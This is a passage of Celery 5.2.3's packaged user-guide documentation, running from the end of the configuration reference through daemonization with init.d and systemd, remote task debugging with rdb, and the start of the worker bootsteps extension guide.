enabled `stdout` and `stderr` will be redirected to the current logger. Used by :program:`celery worker` and :program:`celery beat`. .. setting:: worker_redirect_stdouts_level ``worker_redirect_stdouts_level`` ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Default: :const:`WARNING`. The log level output to `stdout` and `stderr` is logged as. Can be one of :const:`DEBUG`, :const:`INFO`, :const:`WARNING`, :const:`ERROR`, or :const:`CRITICAL`. .. _conf-security: Security -------- .. setting:: security_key ``security_key`` ~~~~~~~~~~~~~~~~ Default: :const:`None`. .. versionadded:: 2.5 The relative or absolute path to a file containing the private key used to sign messages when :ref:`message-signing` is used. .. setting:: security_certificate ``security_certificate`` ~~~~~~~~~~~~~~~~~~~~~~~~ Default: :const:`None`. .. versionadded:: 2.5 The relative or absolute path to an X.509 certificate file used to sign messages when :ref:`message-signing` is used. .. setting:: security_cert_store ``security_cert_store`` ~~~~~~~~~~~~~~~~~~~~~~~ Default: :const:`None`. .. versionadded:: 2.5 The directory containing X.509 certificates used for :ref:`message-signing`. Can be a glob with wild-cards, (for example :file:`/etc/certs/*.pem`). .. setting:: security_digest ``security_digest`` ~~~~~~~~~~~~~~~~~~~~~~~~ Default: :const:`sha256`. .. versionadded:: 4.3 A cryptography digest used to sign messages when :ref:`message-signing` is used. https://cryptography.io/en/latest/hazmat/primitives/cryptographic-hashes/#module-cryptography.hazmat.primitives.hashes .. _conf-custom-components: Custom Component Classes (advanced) ----------------------------------- .. setting:: worker_pool ``worker_pool`` ~~~~~~~~~~~~~~~ Default: ``"prefork"`` (``celery.concurrency.prefork:TaskPool``). Name of the pool class used by the worker. .. admonition:: Eventlet/Gevent Never use this option to select the eventlet or gevent pool. You must use the :option:`-P ` option to :program:`celery worker` instead, to ensure the monkey patches aren't applied too late, causing things to break in strange ways. .. setting:: worker_pool_restarts ``worker_pool_restarts`` ~~~~~~~~~~~~~~~~~~~~~~~~ Default: Disabled by default. If enabled the worker pool can be restarted using the :control:`pool_restart` remote control command. .. setting:: worker_autoscaler ``worker_autoscaler`` ~~~~~~~~~~~~~~~~~~~~~ .. versionadded:: 2.2 Default: ``"celery.worker.autoscale:Autoscaler"``. Name of the autoscaler class to use. .. setting:: worker_consumer ``worker_consumer`` ~~~~~~~~~~~~~~~~~~~ Default: ``"celery.worker.consumer:Consumer"``. Name of the consumer class used by the worker. .. setting:: worker_timer ``worker_timer`` ~~~~~~~~~~~~~~~~ Default: ``"kombu.asynchronous.hub.timer:Timer"``. Name of the ETA scheduler class used by the worker. Default is or set by the pool implementation. .. _conf-celerybeat: Beat Settings (:program:`celery beat`) -------------------------------------- .. setting:: beat_schedule ``beat_schedule`` ~~~~~~~~~~~~~~~~~ Default: ``{}`` (empty mapping). The periodic task schedule used by :mod:`~celery.bin.beat`. See :ref:`beat-entries`. .. setting:: beat_scheduler ``beat_scheduler`` ~~~~~~~~~~~~~~~~~~ Default: ``"celery.beat:PersistentScheduler"``. The default scheduler class. May be set to ``"django_celery_beat.schedulers:DatabaseScheduler"`` for instance, if used alongside :pypi:`django-celery-beat` extension. Can also be set via the :option:`celery beat -S` argument. .. setting:: beat_schedule_filename ``beat_schedule_filename`` ~~~~~~~~~~~~~~~~~~~~~~~~~~ Default: ``"celerybeat-schedule"``. Name of the file used by `PersistentScheduler` to store the last run times of periodic tasks. Can be a relative or absolute path, but be aware that the suffix `.db` may be appended to the file name (depending on Python version). Can also be set via the :option:`celery beat --schedule` argument. .. setting:: beat_sync_every ``beat_sync_every`` ~~~~~~~~~~~~~~~~~~~ Default: 0. The number of periodic tasks that can be called before another database sync is issued. A value of 0 (default) means sync based on timing - default of 3 minutes as determined by scheduler.sync_every. If set to 1, beat will call sync after every task message sent. .. setting:: beat_max_loop_interval ``beat_max_loop_interval`` ~~~~~~~~~~~~~~~~~~~~~~~~~~ Default: 0. The maximum number of seconds :mod:`~celery.bin.beat` can sleep between checking the schedule. The default for this value is scheduler specific. For the default Celery beat scheduler the value is 300 (5 minutes), but for the :pypi:`django-celery-beat` database scheduler it's 5 seconds because the schedule may be changed externally, and so it must take changes to the schedule into account. Also when running Celery beat embedded (:option:`-B `) on Jython as a thread the max interval is overridden and set to 1 so that it's possible to shut down in a timely manner. ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1637501858.0 celery-5.2.3/docs/userguide/daemonizing.rst0000664000175000017500000004226100000000000020664 0ustar00asifasif00000000000000.. _daemonizing: ====================================================================== Daemonization ====================================================================== .. contents:: :local: Most Linux distributions these days use systemd for managing the lifecycle of system and user services. You can check if your Linux distribution uses systemd by typing: .. code-block:: console $ systemd --version systemd 237 +PAM +AUDIT +SELINUX +IMA +APPARMOR +SMACK +SYSVINIT +UTMP +LIBCRYPTSETUP +GCRYPT +GNUTLS +ACL +XZ +LZ4 +SECCOMP +BLKID +ELFUTILS +KMOD -IDN2 +IDN -PCRE2 default-hierarchy=hybrid If you have output similar to the above, please refer to :ref:`our systemd documentation ` for guidance. However, the init.d script should still work in those Linux distributions as well since systemd provides the systemd-sysv compatibility layer which generates services automatically from the init.d scripts we provide. If you package Celery for multiple Linux distributions and some do not support systemd or to other Unix systems as well, you may want to refer to :ref:`our init.d documentation `. .. _daemon-generic: Generic init-scripts ====================================================================== See the `extra/generic-init.d/`_ directory Celery distribution. This directory contains generic bash init-scripts for the :program:`celery worker` program, these should run on Linux, FreeBSD, OpenBSD, and other Unix-like platforms. .. _`extra/generic-init.d/`: https://github.com/celery/celery/tree/master/extra/generic-init.d/ .. _generic-initd-celeryd: Init-script: ``celeryd`` ---------------------------------------------------------------------- :Usage: `/etc/init.d/celeryd {start|stop|restart|status}` :Configuration file: :file:`/etc/default/celeryd` To configure this script to run the worker properly you probably need to at least tell it where to change directory to when it starts (to find the module containing your app, or your configuration module). The daemonization script is configured by the file :file:`/etc/default/celeryd`. This is a shell (:command:`sh`) script where you can add environment variables like the configuration options below. To add real environment variables affecting the worker you must also export them (e.g., :command:`export DISPLAY=":0"`) .. Admonition:: Superuser privileges required The init-scripts can only be used by root, and the shell configuration file must also be owned by root. Unprivileged users don't need to use the init-script, instead they can use the :program:`celery multi` utility (or :program:`celery worker --detach`): .. code-block:: console $ celery -A proj multi start worker1 \ --pidfile="$HOME/run/celery/%n.pid" \ --logfile="$HOME/log/celery/%n%I.log" $ celery -A proj multi restart worker1 \ --logfile="$HOME/log/celery/%n%I.log" \ --pidfile="$HOME/run/celery/%n.pid $ celery multi stopwait worker1 --pidfile="$HOME/run/celery/%n.pid" .. _generic-initd-celeryd-example: Example configuration ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ This is an example configuration for a Python project. :file:`/etc/default/celeryd`: .. code-block:: bash # Names of nodes to start # most people will only start one node: CELERYD_NODES="worker1" # but you can also start multiple and configure settings # for each in CELERYD_OPTS #CELERYD_NODES="worker1 worker2 worker3" # alternatively, you can specify the number of nodes to start: #CELERYD_NODES=10 # Absolute or relative path to the 'celery' command: CELERY_BIN="/usr/local/bin/celery" #CELERY_BIN="/virtualenvs/def/bin/celery" # App instance to use # comment out this line if you don't use an app CELERY_APP="proj" # or fully qualified: #CELERY_APP="proj.tasks:app" # Where to chdir at start. CELERYD_CHDIR="/opt/Myproject/" # Extra command-line arguments to the worker CELERYD_OPTS="--time-limit=300 --concurrency=8" # Configure node-specific settings by appending node name to arguments: #CELERYD_OPTS="--time-limit=300 -c 8 -c:worker2 4 -c:worker3 2 -Ofair:worker1" # Set logging level to DEBUG #CELERYD_LOG_LEVEL="DEBUG" # %n will be replaced with the first part of the nodename. CELERYD_LOG_FILE="/var/log/celery/%n%I.log" CELERYD_PID_FILE="/var/run/celery/%n.pid" # Workers should run as an unprivileged user. # You need to create this user manually (or you can choose # a user/group combination that already exists (e.g., nobody). CELERYD_USER="celery" CELERYD_GROUP="celery" # If enabled pid and log directories will be created if missing, # and owned by the userid/group configured. CELERY_CREATE_DIRS=1 Using a login shell ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ You can inherit the environment of the ``CELERYD_USER`` by using a login shell: .. code-block:: bash CELERYD_SU_ARGS="-l" Note that this isn't recommended, and that you should only use this option when absolutely necessary. .. _generic-initd-celeryd-django-example: Example Django configuration ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Django users now uses the exact same template as above, but make sure that the module that defines your Celery app instance also sets a default value for :envvar:`DJANGO_SETTINGS_MODULE` as shown in the example Django project in :ref:`django-first-steps`. .. _generic-initd-celeryd-options: Available options ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ * ``CELERY_APP`` App instance to use (value for :option:`--app ` argument). * ``CELERY_BIN`` Absolute or relative path to the :program:`celery` program. Examples: * :file:`celery` * :file:`/usr/local/bin/celery` * :file:`/virtualenvs/proj/bin/celery` * :file:`/virtualenvs/proj/bin/python -m celery` * ``CELERYD_NODES`` List of node names to start (separated by space). * ``CELERYD_OPTS`` Additional command-line arguments for the worker, see `celery worker --help` for a list. This also supports the extended syntax used by `multi` to configure settings for individual nodes. See `celery multi --help` for some multi-node configuration examples. * ``CELERYD_CHDIR`` Path to change directory to at start. Default is to stay in the current directory. * ``CELERYD_PID_FILE`` Full path to the PID file. Default is /var/run/celery/%n.pid * ``CELERYD_LOG_FILE`` Full path to the worker log file. Default is /var/log/celery/%n%I.log **Note**: Using `%I` is important when using the prefork pool as having multiple processes share the same log file will lead to race conditions. * ``CELERYD_LOG_LEVEL`` Worker log level. Default is INFO. * ``CELERYD_USER`` User to run the worker as. Default is current user. * ``CELERYD_GROUP`` Group to run worker as. Default is current user. * ``CELERY_CREATE_DIRS`` Always create directories (log directory and pid file directory). Default is to only create directories when no custom logfile/pidfile set. * ``CELERY_CREATE_RUNDIR`` Always create pidfile directory. By default only enabled when no custom pidfile location set. * ``CELERY_CREATE_LOGDIR`` Always create logfile directory. By default only enable when no custom logfile location set. .. _generic-initd-celerybeat: Init-script: ``celerybeat`` ---------------------------------------------------------------------- :Usage: `/etc/init.d/celerybeat {start|stop|restart}` :Configuration file: :file:`/etc/default/celerybeat` or :file:`/etc/default/celeryd`. .. _generic-initd-celerybeat-example: Example configuration ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ This is an example configuration for a Python project: `/etc/default/celerybeat`: .. code-block:: bash # Absolute or relative path to the 'celery' command: CELERY_BIN="/usr/local/bin/celery" #CELERY_BIN="/virtualenvs/def/bin/celery" # App instance to use # comment out this line if you don't use an app CELERY_APP="proj" # or fully qualified: #CELERY_APP="proj.tasks:app" # Where to chdir at start. CELERYBEAT_CHDIR="/opt/Myproject/" # Extra arguments to celerybeat CELERYBEAT_OPTS="--schedule=/var/run/celery/celerybeat-schedule" .. _generic-initd-celerybeat-django-example: Example Django configuration ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ You should use the same template as above, but make sure the ``DJANGO_SETTINGS_MODULE`` variable is set (and exported), and that ``CELERYD_CHDIR`` is set to the projects directory: .. code-block:: bash export DJANGO_SETTINGS_MODULE="settings" CELERYD_CHDIR="/opt/MyProject" .. _generic-initd-celerybeat-options: Available options ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ * ``CELERY_APP`` App instance to use (value for :option:`--app ` argument). * ``CELERYBEAT_OPTS`` Additional arguments to :program:`celery beat`, see :command:`celery beat --help` for a list of available options. * ``CELERYBEAT_PID_FILE`` Full path to the PID file. Default is :file:`/var/run/celeryd.pid`. * ``CELERYBEAT_LOG_FILE`` Full path to the log file. Default is :file:`/var/log/celeryd.log`. * ``CELERYBEAT_LOG_LEVEL`` Log level to use. Default is ``INFO``. * ``CELERYBEAT_USER`` User to run beat as. Default is the current user. * ``CELERYBEAT_GROUP`` Group to run beat as. Default is the current user. * ``CELERY_CREATE_DIRS`` Always create directories (log directory and pid file directory). Default is to only create directories when no custom logfile/pidfile set. * ``CELERY_CREATE_RUNDIR`` Always create pidfile directory. By default only enabled when no custom pidfile location set. * ``CELERY_CREATE_LOGDIR`` Always create logfile directory. By default only enable when no custom logfile location set. .. _generic-initd-troubleshooting: Troubleshooting ---------------------------------------------------------------------- If you can't get the init-scripts to work, you should try running them in *verbose mode*: .. code-block:: console # sh -x /etc/init.d/celeryd start This can reveal hints as to why the service won't start. If the worker starts with *"OK"* but exits almost immediately afterwards and there's no evidence in the log file, then there's probably an error but as the daemons standard outputs are already closed you'll not be able to see them anywhere. For this situation you can use the :envvar:`C_FAKEFORK` environment variable to skip the daemonization step: .. code-block:: console # C_FAKEFORK=1 sh -x /etc/init.d/celeryd start and now you should be able to see the errors. Commonly such errors are caused by insufficient permissions to read from, or write to a file, and also by syntax errors in configuration modules, user modules, third-party libraries, or even from Celery itself (if you've found a bug you should :ref:`report it `). .. _daemon-systemd-generic: Usage ``systemd`` ====================================================================== * `extra/systemd/`_ .. _`extra/systemd/`: https://github.com/celery/celery/tree/master/extra/systemd/ .. _generic-systemd-celery: :Usage: `systemctl {start|stop|restart|status} celery.service` :Configuration file: /etc/conf.d/celery Service file: celery.service ---------------------------------------------------------------------- This is an example systemd file: :file:`/etc/systemd/system/celery.service`: .. code-block:: bash [Unit] Description=Celery Service After=network.target [Service] Type=forking User=celery Group=celery EnvironmentFile=/etc/conf.d/celery WorkingDirectory=/opt/celery ExecStart=/bin/sh -c '${CELERY_BIN} -A $CELERY_APP multi start $CELERYD_NODES \ --pidfile=${CELERYD_PID_FILE} --logfile=${CELERYD_LOG_FILE} \ --loglevel="${CELERYD_LOG_LEVEL}" $CELERYD_OPTS' ExecStop=/bin/sh -c '${CELERY_BIN} multi stopwait $CELERYD_NODES \ --pidfile=${CELERYD_PID_FILE} --logfile=${CELERYD_LOG_FILE} \ --loglevel="${CELERYD_LOG_LEVEL}"' ExecReload=/bin/sh -c '${CELERY_BIN} -A $CELERY_APP multi restart $CELERYD_NODES \ --pidfile=${CELERYD_PID_FILE} --logfile=${CELERYD_LOG_FILE} \ --loglevel="${CELERYD_LOG_LEVEL}" $CELERYD_OPTS' Restart=always [Install] WantedBy=multi-user.target Once you've put that file in :file:`/etc/systemd/system`, you should run :command:`systemctl daemon-reload` in order that Systemd acknowledges that file. You should also run that command each time you modify it. Use :command:`systemctl enable celery.service` if you want the celery service to automatically start when (re)booting the system. Optionally you can specify extra dependencies for the celery service: e.g. if you use RabbitMQ as a broker, you could specify ``rabbitmq-server.service`` in both ``After=`` and ``Requires=`` in the ``[Unit]`` `systemd section `_. To configure user, group, :command:`chdir` change settings: ``User``, ``Group``, and ``WorkingDirectory`` defined in :file:`/etc/systemd/system/celery.service`. You can also use systemd-tmpfiles in order to create working directories (for logs and pid). :file: `/etc/tmpfiles.d/celery.conf` .. code-block:: bash d /run/celery 0755 celery celery - d /var/log/celery 0755 celery celery - .. _generic-systemd-celery-example: Example configuration ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ This is an example configuration for a Python project: :file:`/etc/conf.d/celery`: .. code-block:: bash # Name of nodes to start # here we have a single node CELERYD_NODES="w1" # or we could have three nodes: #CELERYD_NODES="w1 w2 w3" # Absolute or relative path to the 'celery' command: CELERY_BIN="/usr/local/bin/celery" #CELERY_BIN="/virtualenvs/def/bin/celery" # App instance to use # comment out this line if you don't use an app CELERY_APP="proj" # or fully qualified: #CELERY_APP="proj.tasks:app" # How to call manage.py CELERYD_MULTI="multi" # Extra command-line arguments to the worker CELERYD_OPTS="--time-limit=300 --concurrency=8" # - %n will be replaced with the first part of the nodename. # - %I will be replaced with the current child process index # and is important when using the prefork pool to avoid race conditions. CELERYD_PID_FILE="/var/run/celery/%n.pid" CELERYD_LOG_FILE="/var/log/celery/%n%I.log" CELERYD_LOG_LEVEL="INFO" # you may wish to add these options for Celery Beat CELERYBEAT_PID_FILE="/var/run/celery/beat.pid" CELERYBEAT_LOG_FILE="/var/log/celery/beat.log" Service file: celerybeat.service ---------------------------------------------------------------------- This is an example systemd file for Celery Beat: :file:`/etc/systemd/system/celerybeat.service`: .. code-block:: bash [Unit] Description=Celery Beat Service After=network.target [Service] Type=simple User=celery Group=celery EnvironmentFile=/etc/conf.d/celery WorkingDirectory=/opt/celery ExecStart=/bin/sh -c '${CELERY_BIN} -A ${CELERY_APP} beat \ --pidfile=${CELERYBEAT_PID_FILE} \ --logfile=${CELERYBEAT_LOG_FILE} --loglevel=${CELERYD_LOG_LEVEL}' Restart=always [Install] WantedBy=multi-user.target Once you've put that file in :file:`/etc/systemd/system`, you should run :command:`systemctl daemon-reload` in order that Systemd acknowledges that file. You should also run that command each time you modify it. Use :command:`systemctl enable celerybeat.service` if you want the celery beat service to automatically start when (re)booting the system. Running the worker with superuser privileges (root) ====================================================================== Running the worker with superuser privileges is a very dangerous practice. There should always be a workaround to avoid running as root. Celery may run arbitrary code in messages serialized with pickle - this is dangerous, especially when run as root. By default Celery won't run workers as root. The associated error message may not be visible in the logs but may be seen if :envvar:`C_FAKEFORK` is used. To force Celery to run workers as root use :envvar:`C_FORCE_ROOT`. When running as root without :envvar:`C_FORCE_ROOT` the worker will appear to start with *"OK"* but exit immediately after with no apparent errors. This problem may appear when running the project in a new development or production environment (inadvertently) as root. .. _daemon-supervisord: :pypi:`supervisor` ====================================================================== * `extra/supervisord/`_ .. _`extra/supervisord/`: https://github.com/celery/celery/tree/master/extra/supervisord/ .. _daemon-launchd: ``launchd`` (macOS) ====================================================================== * `extra/macOS`_ .. _`extra/macOS`: https://github.com/celery/celery/tree/master/extra/macOS/ ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/userguide/debugging.rst0000664000175000017500000000607300000000000020314 0ustar00asifasif00000000000000.. _guide-debugging: ====================================== Debugging ====================================== .. _tut-remote_debug: Debugging Tasks Remotely (using pdb) ==================================== Basics ------ :mod:`celery.contrib.rdb` is an extended version of :mod:`pdb` that enables remote debugging of processes that doesn't have terminal access. Example usage: .. code-block:: python from celery import task from celery.contrib import rdb @task() def add(x, y): result = x + y rdb.set_trace() # <- set break-point return result :func:`~celery.contrib.rdb.set_trace` sets a break-point at the current location and creates a socket you can telnet into to remotely debug your task. The debugger may be started by multiple processes at the same time, so rather than using a fixed port the debugger will search for an available port, starting from the base port (6900 by default). The base port can be changed using the environment variable :envvar:`CELERY_RDB_PORT`. By default the debugger will only be available from the local host, to enable access from the outside you have to set the environment variable :envvar:`CELERY_RDB_HOST`. When the worker encounters your break-point it'll log the following information: .. code-block:: text [INFO/MainProcess] Received task: tasks.add[d7261c71-4962-47e5-b342-2448bedd20e8] [WARNING/PoolWorker-1] Remote Debugger:6900: Please telnet 127.0.0.1 6900. Type `exit` in session to continue. [2011-01-18 14:25:44,119: WARNING/PoolWorker-1] Remote Debugger:6900: Waiting for client... If you telnet the port specified you'll be presented with a `pdb` shell: .. code-block:: console $ telnet localhost 6900 Connected to localhost. Escape character is '^]'. > /opt/devel/demoapp/tasks.py(128)add() -> return result (Pdb) Enter ``help`` to get a list of available commands, It may be a good idea to read the `Python Debugger Manual`_ if you have never used `pdb` before. To demonstrate, we'll read the value of the ``result`` variable, change it and continue execution of the task: .. code-block:: text (Pdb) result 4 (Pdb) result = 'hello from rdb' (Pdb) continue Connection closed by foreign host. The result of our vandalism can be seen in the worker logs: .. code-block:: text [2011-01-18 14:35:36,599: INFO/MainProcess] Task tasks.add[d7261c71-4962-47e5-b342-2448bedd20e8] succeeded in 61.481s: 'hello from rdb' .. _`Python Debugger Manual`: http://docs.python.org/library/pdb.html Tips ---- .. _breakpoint_signal: Enabling the break-point signal ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ If the environment variable :envvar:`CELERY_RDBSIG` is set, the worker will open up an rdb instance whenever the `SIGUSR2` signal is sent. This is the case for both main and worker processes. For example starting the worker with: .. code-block:: console $ CELERY_RDBSIG=1 celery worker -l INFO You can start an rdb session for any of the worker processes by executing: .. code-block:: console $ kill -USR2 ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/userguide/extending.rst0000664000175000017500000007255500000000000020356 0ustar00asifasif00000000000000.. _guide-extending: ========================== Extensions and Bootsteps ========================== .. contents:: :local: :depth: 2 .. _extending-custom-consumers: Custom Message Consumers ======================== You may want to embed custom Kombu consumers to manually process your messages. For that purpose a special :class:`~celery.bootstep.ConsumerStep` bootstep class exists, where you only need to define the ``get_consumers`` method, that must return a list of :class:`kombu.Consumer` objects to start whenever the connection is established: .. code-block:: python from celery import Celery from celery import bootsteps from kombu import Consumer, Exchange, Queue my_queue = Queue('custom', Exchange('custom'), 'routing_key') app = Celery(broker='amqp://') class MyConsumerStep(bootsteps.ConsumerStep): def get_consumers(self, channel): return [Consumer(channel, queues=[my_queue], callbacks=[self.handle_message], accept=['json'])] def handle_message(self, body, message): print('Received message: {0!r}'.format(body)) message.ack() app.steps['consumer'].add(MyConsumerStep) def send_me_a_message(who, producer=None): with app.producer_or_acquire(producer) as producer: producer.publish( {'hello': who}, serializer='json', exchange=my_queue.exchange, routing_key='routing_key', declare=[my_queue], retry=True, ) if __name__ == '__main__': send_me_a_message('world!') .. note:: Kombu Consumers can take use of two different message callback dispatching mechanisms. The first one is the ``callbacks`` argument that accepts a list of callbacks with a ``(body, message)`` signature, the second one is the ``on_message`` argument that takes a single callback with a ``(message,)`` signature. The latter won't automatically decode and deserialize the payload. .. code-block:: python def get_consumers(self, channel): return [Consumer(channel, queues=[my_queue], on_message=self.on_message)] def on_message(self, message): payload = message.decode() print( 'Received message: {0!r} {props!r} rawlen={s}'.format( payload, props=message.properties, s=len(message.body), )) message.ack() .. _extending-blueprints: Blueprints ========== Bootsteps is a technique to add functionality to the workers. A bootstep is a custom class that defines hooks to do custom actions at different stages in the worker. Every bootstep belongs to a blueprint, and the worker currently defines two blueprints: **Worker**, and **Consumer** ---------------------------------------------------------- **Figure A:** Bootsteps in the Worker and Consumer blueprints. Starting from the bottom up the first step in the worker blueprint is the Timer, and the last step is to start the Consumer blueprint, that then establishes the broker connection and starts consuming messages. .. figure:: ../images/worker_graph_full.png ---------------------------------------------------------- .. _extending-worker_blueprint: Worker ====== The Worker is the first blueprint to start, and with it starts major components like the event loop, processing pool, and the timer used for ETA tasks and other timed events. When the worker is fully started it continues with the Consumer blueprint, that sets up how tasks are executed, connects to the broker and starts the message consumers. The :class:`~celery.worker.WorkController` is the core worker implementation, and contains several methods and attributes that you can use in your bootstep. .. _extending-worker_blueprint-attributes: Attributes ---------- .. _extending-worker-app: .. attribute:: app The current app instance. .. _extending-worker-hostname: .. attribute:: hostname The workers node name (e.g., `worker1@example.com`) .. _extending-worker-blueprint: .. attribute:: blueprint This is the worker :class:`~celery.bootsteps.Blueprint`. .. _extending-worker-hub: .. attribute:: hub Event loop object (:class:`~kombu.asynchronous.Hub`). You can use this to register callbacks in the event loop. This is only supported by async I/O enabled transports (amqp, redis), in which case the `worker.use_eventloop` attribute should be set. Your worker bootstep must require the Hub bootstep to use this: .. code-block:: python class WorkerStep(bootsteps.StartStopStep): requires = {'celery.worker.components:Hub'} .. _extending-worker-pool: .. attribute:: pool The current process/eventlet/gevent/thread pool. See :class:`celery.concurrency.base.BasePool`. Your worker bootstep must require the Pool bootstep to use this: .. code-block:: python class WorkerStep(bootsteps.StartStopStep): requires = {'celery.worker.components:Pool'} .. _extending-worker-timer: .. attribute:: timer :class:`~kombu.asynchronous.timer.Timer` used to schedule functions. Your worker bootstep must require the Timer bootstep to use this: .. code-block:: python class WorkerStep(bootsteps.StartStopStep): requires = {'celery.worker.components:Timer'} .. _extending-worker-statedb: .. attribute:: statedb :class:`Database `` to persist state between worker restarts. This is only defined if the ``statedb`` argument is enabled. Your worker bootstep must require the ``Statedb`` bootstep to use this: .. code-block:: python class WorkerStep(bootsteps.StartStopStep): requires = {'celery.worker.components:Statedb'} .. _extending-worker-autoscaler: .. attribute:: autoscaler :class:`~celery.worker.autoscaler.Autoscaler` used to automatically grow and shrink the number of processes in the pool. This is only defined if the ``autoscale`` argument is enabled. Your worker bootstep must require the `Autoscaler` bootstep to use this: .. code-block:: python class WorkerStep(bootsteps.StartStopStep): requires = ('celery.worker.autoscaler:Autoscaler',) .. _extending-worker-autoreloader: .. attribute:: autoreloader :class:`~celery.worker.autoreloder.Autoreloader` used to automatically reload use code when the file-system changes. This is only defined if the ``autoreload`` argument is enabled. Your worker bootstep must require the `Autoreloader` bootstep to use this; .. code-block:: python class WorkerStep(bootsteps.StartStopStep): requires = ('celery.worker.autoreloader:Autoreloader',) Example worker bootstep ----------------------- An example Worker bootstep could be: .. code-block:: python from celery import bootsteps class ExampleWorkerStep(bootsteps.StartStopStep): requires = {'celery.worker.components:Pool'} def __init__(self, worker, **kwargs): print('Called when the WorkController instance is constructed') print('Arguments to WorkController: {0!r}'.format(kwargs)) def create(self, worker): # this method can be used to delegate the action methods # to another object that implements ``start`` and ``stop``. return self def start(self, worker): print('Called when the worker is started.') def stop(self, worker): print('Called when the worker shuts down.') def terminate(self, worker): print('Called when the worker terminates') Every method is passed the current ``WorkController`` instance as the first argument. Another example could use the timer to wake up at regular intervals: .. code-block:: python from celery import bootsteps class DeadlockDetection(bootsteps.StartStopStep): requires = {'celery.worker.components:Timer'} def __init__(self, worker, deadlock_timeout=3600): self.timeout = deadlock_timeout self.requests = [] self.tref = None def start(self, worker): # run every 30 seconds. self.tref = worker.timer.call_repeatedly( 30.0, self.detect, (worker,), priority=10, ) def stop(self, worker): if self.tref: self.tref.cancel() self.tref = None def detect(self, worker): # update active requests for req in worker.active_requests: if req.time_start and time() - req.time_start > self.timeout: raise SystemExit() Customizing Task Handling Logs ------------------------------ The Celery worker emits messages to the Python logging subsystem for various events throughout the lifecycle of a task. These messages can be customized by overriding the ``LOG_`` format strings which are defined in :file:`celery/app/trace.py`. For example: .. code-block:: python import celery.app.trace celery.app.trace.LOG_SUCCESS = "This is a custom message" The various format strings are all provided with the task name and ID for ``%`` formatting, and some of them receive extra fields like the return value or the exception which caused a task to fail. These fields can be used in custom format strings like so: .. code-block:: python import celery.app.trace celery.app.trace.LOG_REJECTED = "%(name)r is cursed and I won't run it: %(exc)s" .. _extending-consumer_blueprint: Consumer ======== The Consumer blueprint establishes a connection to the broker, and is restarted every time this connection is lost. Consumer bootsteps include the worker heartbeat, the remote control command consumer, and importantly, the task consumer. When you create consumer bootsteps you must take into account that it must be possible to restart your blueprint. An additional 'shutdown' method is defined for consumer bootsteps, this method is called when the worker is shutdown. .. _extending-consumer-attributes: Attributes ---------- .. _extending-consumer-app: .. attribute:: app The current app instance. .. _extending-consumer-controller: .. attribute:: controller The parent :class:`~@WorkController` object that created this consumer. .. _extending-consumer-hostname: .. attribute:: hostname The workers node name (e.g., `worker1@example.com`) .. _extending-consumer-blueprint: .. attribute:: blueprint This is the worker :class:`~celery.bootsteps.Blueprint`. .. _extending-consumer-hub: .. attribute:: hub Event loop object (:class:`~kombu.asynchronous.Hub`). You can use this to register callbacks in the event loop. This is only supported by async I/O enabled transports (amqp, redis), in which case the `worker.use_eventloop` attribute should be set. Your worker bootstep must require the Hub bootstep to use this: .. code-block:: python class WorkerStep(bootsteps.StartStopStep): requires = {'celery.worker.components:Hub'} .. _extending-consumer-connection: .. attribute:: connection The current broker connection (:class:`kombu.Connection`). A consumer bootstep must require the 'Connection' bootstep to use this: .. code-block:: python class Step(bootsteps.StartStopStep): requires = {'celery.worker.consumer.connection:Connection'} .. _extending-consumer-event_dispatcher: .. attribute:: event_dispatcher A :class:`@events.Dispatcher` object that can be used to send events. A consumer bootstep must require the `Events` bootstep to use this. .. code-block:: python class Step(bootsteps.StartStopStep): requires = {'celery.worker.consumer.events:Events'} .. _extending-consumer-gossip: .. attribute:: gossip Worker to worker broadcast communication (:class:`~celery.worker.consumer.gossip.Gossip`). A consumer bootstep must require the `Gossip` bootstep to use this. .. code-block:: python class RatelimitStep(bootsteps.StartStopStep): """Rate limit tasks based on the number of workers in the cluster.""" requires = {'celery.worker.consumer.gossip:Gossip'} def start(self, c): self.c = c self.c.gossip.on.node_join.add(self.on_cluster_size_change) self.c.gossip.on.node_leave.add(self.on_cluster_size_change) self.c.gossip.on.node_lost.add(self.on_node_lost) self.tasks = [ self.app.tasks['proj.tasks.add'] self.app.tasks['proj.tasks.mul'] ] self.last_size = None def on_cluster_size_change(self, worker): cluster_size = len(list(self.c.gossip.state.alive_workers())) if cluster_size != self.last_size: for task in self.tasks: task.rate_limit = 1.0 / cluster_size self.c.reset_rate_limits() self.last_size = cluster_size def on_node_lost(self, worker): # may have processed heartbeat too late, so wake up soon # in order to see if the worker recovered. self.c.timer.call_after(10.0, self.on_cluster_size_change) **Callbacks** - `` gossip.on.node_join`` Called whenever a new node joins the cluster, providing a :class:`~celery.events.state.Worker` instance. - `` gossip.on.node_leave`` Called whenever a new node leaves the cluster (shuts down), providing a :class:`~celery.events.state.Worker` instance. - `` gossip.on.node_lost`` Called whenever heartbeat was missed for a worker instance in the cluster (heartbeat not received or processed in time), providing a :class:`~celery.events.state.Worker` instance. This doesn't necessarily mean the worker is actually offline, so use a time out mechanism if the default heartbeat timeout isn't sufficient. .. _extending-consumer-pool: .. attribute:: pool The current process/eventlet/gevent/thread pool. See 